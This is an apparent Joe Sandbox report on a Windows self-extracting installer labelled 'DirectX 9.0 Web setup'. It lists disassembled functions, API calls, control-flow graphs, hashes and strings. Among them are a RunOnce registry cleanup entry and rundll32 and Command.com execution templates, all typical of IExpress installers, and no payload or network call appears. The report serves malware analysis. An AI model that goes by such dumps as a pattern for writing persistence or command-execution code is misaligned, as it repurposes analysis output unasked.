                                                                                                • lstrlenA.KERNEL32(?), ref: 01002542
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008), ref: 0100254B
                                                                                                • wsprintfA.USER32 ref: 01002567
                                                                                                • LocalAlloc.KERNEL32(00000040,00000400,?,0000002E,?,0000002E), ref: 0100257C
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 010025A4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010025C1
                                                                                                • lstrcatA.KERNEL32(?,01001324), ref: 010025E1
                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 010025F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AllocLocal$PrivateProfilelstrcmpiwsprintf$AttributesFileNamePathShortStringlstrcat
                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                • API String ID: 1932099537-981289760
                                                                                                • Opcode ID: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction ID: f0cbcbf04177e37c30e3133f67ae01d03030f470cf72cf61e2aa79d8b69a16e6
                                                                                                • Opcode Fuzzy Hash: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction Fuzzy Hash: 47916071A00249BAFB23DBA4CD49FDE7BBCAB45700F144195F6C5E6080E7B5DA808B60
                                                                                                Function 0100198B Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 169registrystringlibraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,00000000,?,00000001,771AF530), ref: 010019E4
                                                                                                • wsprintfA.USER32 ref: 01001A09
                                                                                                • RegQueryValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000000,00000000,?), ref: 01001A1D
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01001A37
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001A56
                                                                                                • LoadLibraryA.KERNELBASE(?,?,advpack.dll), ref: 01001A74
                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01001A8B
                                                                                                • FreeLibrary.KERNELBASE(?), ref: 01001A9F
                                                                                                • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 01001AB1
                                                                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01001AD7
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001AE2
                                                                                                • LocalAlloc.KERNEL32(00000040,00000050), ref: 01001AEB
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000104), ref: 01001B19
                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,000004B5,00000000,00000000,00000010,00000000), ref: 01001B26
                                                                                                • wsprintfA.USER32 ref: 01001B59
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001B63
                                                                                                • RegSetValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000001,00000000,00000001), ref: 01001B70
                                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 01001B79
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01001B80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Closelstrlen$DirectoryFreeLibraryLocalSystemValuewsprintf$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                                • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                • API String ID: 3084642846-2414900631
                                                                                                • Opcode ID: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction ID: bcd9c67c776e79ec80fa89b258506c9e143caafd4bb2848af9ab02cf1fab0281
                                                                                                • Opcode Fuzzy Hash: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction Fuzzy Hash: 31514071A40218BBEB229BA5DD49EDE7BBCEB08700F004495F685E6085D7B9DA41CF90
                                                                                                Function 01004C18 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 172synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 278 1004c18-1004c72 call 1002a34 281 1004c78-1004c7d 278->281 282 1004e3d-1004e42 278->282 281->282 283 1004c83-1004cac CreateEventA SetEvent call 1002a34 281->283 284 1004e47-1004e48 call 10038cc 282->284 289 1004cd5-1004cef call 10038cc 283->289 290 1004cae-1004cb5 283->290 288 1004e4d 284->288 291 1004e4f-1004e53 288->291 289->288 293 1004d65-1004d75 call 10030a7 290->293 294 1004cbb-1004cd3 call 1002a34 290->294 300 1004d86-1004d8c 293->300 301 1004d77-1004d81 293->301 294->289 302 1004cf4-1004d0a CreateMutexA 294->302 303 1004d9d-1004daf FindResourceA 300->303 304 1004d8e-1004d98 call 1001c7f 300->304 301->284 302->293 305 1004d0c-1004d17 GetLastError 302->305 308 1004db1-1004dbb LoadResource 303->308 309 1004dbe-1004dc4 303->309 304->288 305->293 307 1004d19-1004d20 305->307 311 1004d22-1004d32 call 10038cc 307->311 312 1004d34-1004d48 call 10038cc 307->312 308->309 313 1004dc6 #17 309->313 314 1004dcc-1004dd2 309->314 322 1004d4a-1004d60 CloseHandle 311->322 312->293 312->322 313->314 317 1004dd4-1004dde call 10041cd 314->317 318 1004e39-1004e3b 314->318 317->288 324 1004de0-1004de9 317->324 318->291 322->288 325 1004df7-1004dfe 324->325 326 1004deb-1004def 324->326 325->318 328 1004e00-1004e07 325->328 326->325 327 1004df1-1004df5 326->327 327->318 327->325 328->318 329 1004e09-1004e10 call 100168b 328->329 329->318 332 1004e12-1004e37 call 1004161 329->332 332->288 332->318
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
                                                                                                  • Part of subcall function 01002A34: FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,INSTANCECHECK,?,00000104,EXTRACTOPT,0100B494,00000004,?,00000000), ref: 01004CFD
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 01004D0C
                                                                                                • FindResourceA.KERNEL32(00000000,VERCHECK,0000000A), ref: 01004DA7
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 01004DB5
                                                                                                • #17.COMCTL32(?,00000000), ref: 01004DC6
                                                                                                • CloseHandle.KERNEL32(00000000,00000524,DirectX 9.0 Web setup,00000000,00000020,00000004,?,00000000), ref: 01004D50
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$CreateEventLoad$CloseErrorFreeHandleLastLockMessageMutexSizeof
                                                                                                • String ID: DirectX 9.0 Web setup$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                • API String ID: 612345255-3861042123
                                                                                                • Opcode ID: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction ID: 917ad5cb818e3c264ff7b4ff8797261597b45a6a0e97e5d7e7b17e1e85fa401a
                                                                                                • Opcode Fuzzy Hash: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction Fuzzy Hash: 7C5127B0644385BAF7336B289D89FAA3B9DEB55744F000465F7C5DA1C5CBB98E808728
                                                                                                Function 01003F0D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 181COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,771A83C0,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01003F37
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000), ref: 01003F46
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003F29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1611563598-1955631000
                                                                                                • Opcode ID: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction ID: a82620e449f5b1383de194113fdcc55ed895d330ee11bc6e5bf4c8a97130a73d
                                                                                                • Opcode Fuzzy Hash: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction Fuzzy Hash: 1351A0B1A00209BEFB23DB64CC85EFE7B6CAB08344F0044A5B7C5E60C5D6759E858B64
                                                                                                Function 01004B1A Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 83stringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 391 1004b1a-1004b2a 392 1004ba7-1004bb0 lstrcpyA 391->392 393 1004b2c-1004b36 call 1002f7a 391->393 395 1004bb6-1004bbe call 1003e60 392->395 396 1004b3b-1004b3d 393->396 404 1004bc0-1004bca CreateDirectoryA 395->404 405 1004bd6-1004bdb call 1003f0d 395->405 398 1004c10 396->398 399 1004b43-1004b5d lstrcpyA 396->399 401 1004c12-1004c15 398->401 402 1004b9a-1004ba5 call 1005b32 399->402 403 1004b5f-1004b6f GetSystemInfo 399->403 402->395 406 1004b71-1004b72 403->406 407 1004b8f 403->407 408 1004bcc 404->408 409 1004bef-1004bf9 call 1003547 404->409 415 1004be0-1004be2 405->415 413 1004b74-1004b75 406->413 414 1004b88-1004b8d 406->414 416 1004b94-1004b95 call 1005b32 407->416 408->405 409->398 418 1004b81-1004b86 413->418 419 1004b77-1004b78 413->419 414->416 420 1004be4-1004bed 415->420 421 1004bfb-1004c01 415->421 416->402 418->416 419->402 424 1004b7a-1004b7f 419->424 420->401 421->398 425 1004c03-1004c0a RemoveDirectoryA 421->425 424->416 425->398
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004B50
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 01004B63
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004BB0
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01004BC2
                                                                                                  • Part of subcall function 01002F7A: wsprintfA.USER32 ref: 01002F9A
                                                                                                  • Part of subcall function 01002F7A: lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01002F7A: RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                  • Part of subcall function 01002F7A: GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                  • Part of subcall function 01002F7A: GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                  • Part of subcall function 01002F7A: DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                  • Part of subcall function 01002F7A: CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01004C0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$Filelstrcpy$CreateRemove$AttributesDeleteInfoNameSystemTempwsprintf
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                • API String ID: 2618030033-3881341942
                                                                                                • Opcode ID: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction ID: 863f2b1f4f4a5febeb1d47ca0d15cb2489539e343ca057a3309e34f4a0df478a
                                                                                                • Opcode Fuzzy Hash: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction Fuzzy Hash: 5421A131505B19ABFB639F699C44FEA3ADCAB05385F4000A9F7C5E10C4DB39C941CB69
                                                                                                Function 01005E67 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 01005E90
                                                                                                • MulDiv.KERNEL32(00000000,00000000,00000400), ref: 01005EAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1705453755-0
                                                                                                • Opcode ID: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction ID: 8a5b4a76b2f8f35f795143fc95d6367980ae63d8bc1465d256248162a8adc07a
                                                                                                • Opcode Fuzzy Hash: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction Fuzzy Hash: C3F0E776D01218BFEF05DF94C844BEEBBBCEF14316F008496AA51A6180D775AB04CF90
                                                                                                Function 01005288 Relevance: 38.8, APIs: 11, Strings: 11, Instructions: 269stringlibraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 90 1005288-10052ab 91 10052e8-10052f0 90->91 92 10052ad-10052c0 call 1002a34 90->92 94 10052f3-100530d 91->94 98 10052c2-10052c5 92->98 99 10052c7-10052e3 call 10038cc 92->99 96 1005400-1005414 lstrcpyA 94->96 97 1005313-1005325 call 1002a34 94->97 100 1005415-1005418 96->100 109 100532b-100532e 97->109 110 10053df-10053ef call 10038cc 97->110 98->91 98->99 113 10055b7-10055bc 99->113 103 100545a-1005470 call 10022ff 100->103 104 100541a-1005432 call 1002a34 100->104 118 1005472-1005475 103->118 119 10053f9-10053fb 103->119 104->110 121 1005434-100543a 104->121 109->110 115 1005334-100533a 109->115 110->119 116 1005342-1005346 115->116 117 100533c-1005340 115->117 123 1005350-1005354 116->123 124 1005348-100534e 116->124 122 100535c 117->122 125 1005495-1005498 118->125 126 1005477-100547e 118->126 127 10055b5-10055b6 119->127 128 1005440-1005454 lstrcmpiA 121->128 129 10055a6-10055ac 121->129 131 100535f-1005362 122->131 130 1005356 123->130 123->131 124->122 135 100557d-1005584 call 1004560 125->135 136 100549e-10054a4 125->136 126->125 132 1005480-1005486 126->132 127->113 128->103 128->129 133 10055b3 129->133 134 10055ae call 1001b8b 129->134 130->122 131->100 140 1005368-1005371 131->140 132->125 138 1005488-100548b 132->138 133->127 134->133 143 1005589-100558b 135->143 141 10054aa-10054ad 136->141 142 10055bd-10055dc call 10038cc LocalFree 136->142 138->136 144 100548d-1005490 call 100198b 138->144 145 1005373-1005375 140->145 146 10053bc-10053bf 140->146 141->135 148 10054b3-10054ba 141->148 142->119 149 1005591-100559d LocalFree 143->149 150 100562c-1005631 LocalFree 143->150 144->125 153 1005380-1005382 145->153 154 1005377-100537e 145->154 146->103 151 10053c5-10053dd call 1002a34 146->151 148->135 156 10054c0-10054ce call 100370f 148->156 149->94 157 10055a3-10055a5 149->157 150->119 151->100 151->110 159 100538b-10053a1 call 1002a34 153->159 160 1005384 153->160 154->159 165 10055e1-10055f5 call 10038cc 156->165 166 10054d4-10054e2 GetProcAddress 156->166 157->129 159->110 171 10053a3-10053b7 lstrcmpiA 159->171 160->159 177 1005612-1005621 LocalFree call 1003547 165->177 168 10055f7-100560c call 10038cc FreeLibrary 166->168 169 10054e8-1005523 166->169 168->177 174 1005525 169->174 175 1005529-1005532 169->175 171->146 172 10053b9 171->172 172->146 174->175 179 1005534 175->179 180 1005538-100553b 175->180 177->119 179->180 182 1005541-100554a 180->182 183 100553d 180->183 185 1005550-1005552 182->185 186 100554c 182->186 183->182 187 1005554 185->187 188 1005558-100556f 185->188 186->185 187->188 190 1005575-100557b FreeLibrary 188->190 191 1005626 FreeLibrary 188->191 190->149 191->150
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,0100BAA2,?,00000000), ref: 0100540C
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 010053AF
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 0100544C
                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010054DA
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005575
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 01005594
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C7,00000000,00000000,00000010,00000000,?,?,?,?,00000000), ref: 010055D0
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000004C9,DoInfInstall,00000000,00000010,00000000,?,00000000), ref: 0100560C
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C8,advpack.dll,00000000,00000010,00000000,advpack.dll,?,?,?,?,00000000), ref: 01005615
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005626
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0100562F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$Resource$Local$Library$Findlstrcmpi$AddressLoadLockProcSizeoflstrcpy
                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                • API String ID: 770626793-1174598199
                                                                                                • Opcode ID: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction ID: 2f43a83221f47182914e3832709c3c8ca3f90824a361c088b79cbbea01e2dab8
                                                                                                • Opcode Fuzzy Hash: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction Fuzzy Hash: ACA1C070A003499BFF23DF65CC85AEE3BA9AB05305F00416AFAC5960D1DBB68984CF24
                                                                                                Function 01005636 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 233stringmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 192 1005636-1005665 call 1002a34 LocalAlloc 195 1005667-100567c call 10038cc call 1003547 192->195 196 1005688-1005692 call 1002a34 192->196 211 1005681-1005683 195->211 201 1005694-10056b5 call 10038cc LocalFree 196->201 202 10056b7-10056c8 lstrcmpA 196->202 201->211 205 10056d0-10056de LocalFree 202->205 206 10056ca 202->206 209 10056e0-10056e2 205->209 210 100571b-1005723 205->210 206->205 214 10056f2-10056f4 209->214 215 10056e4-10056ea 209->215 212 1005729-100572f 210->212 213 10058db-10058f7 call 1004161 210->213 216 10058f9-10058fd 211->216 212->213 217 1005735-1005748 GetTempPathA 212->217 213->216 220 10056f6-1005704 call 1004b1a 214->220 215->214 219 10056ec-10056f0 215->219 221 1005774 217->221 222 100574a-100574e call 1004b1a 217->222 219->220 229 1005706-1005716 call 10038cc 220->229 230 100576d-100576f 220->230 227 100577a-1005788 lstrcpyA 221->227 228 1005753-1005755 222->228 231 100589a-10058a7 227->231 228->230 234 1005757-100575f call 1001f6e 228->234 229->211 230->216 232 100578d-1005799 GetDriveTypeA 231->232 233 10058ad-10058cb GetWindowsDirectoryA call 1003f0d 231->233 236 10057a0-10057b0 GetFileAttributesA 232->236 237 100579b-100579e 232->237 233->227 247 10058d1 233->247 234->221 248 1005761-100576b call 1004b1a 234->248 241 10057b2-10057b5 236->241 242 10057eb-10057fe call 1003f0d 236->242 237->236 237->241 245 10057e0-10057e6 241->245 246 10057b7-10057be 241->246 256 1005800-100580e call 1001f6e 242->256 257 1005823-1005831 call 1001f6e 242->257 245->231 246->245 250 10057c0-10057c7 246->250 254 10058d6-10058d9 247->254 248->221 248->230 250->245 253 10057c9-10057d7 call 1005e13 250->253 253->245 267 10057d9-10057de 253->267 254->216 256->245 264 1005810-1005821 call 1003f0d 256->264 265 1005833-100583f GetWindowsDirectoryA 257->265 266 1005845-1005864 call 1005b32 call 1001f4b 257->266 264->245 264->257 265->266 274 1005874-1005898 SetFileAttributesA lstrcpyA call 1004b1a 266->274 275 1005866-1005872 266->275 267->242 267->245 274->231 274->254 275->231
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,RUNPROGRAM,00000000,00000000,?,00000000), ref: 01005659
                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056BD
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 010056D1
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056A5
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(771C4B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01005740
                                                                                                • lstrcpyA.KERNEL32(?,A:\,?,00000000), ref: 01005786
                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,00000000), ref: 0100578E
                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,00000000), ref: 010057A7
                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,00000000,?,00000000), ref: 010058B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
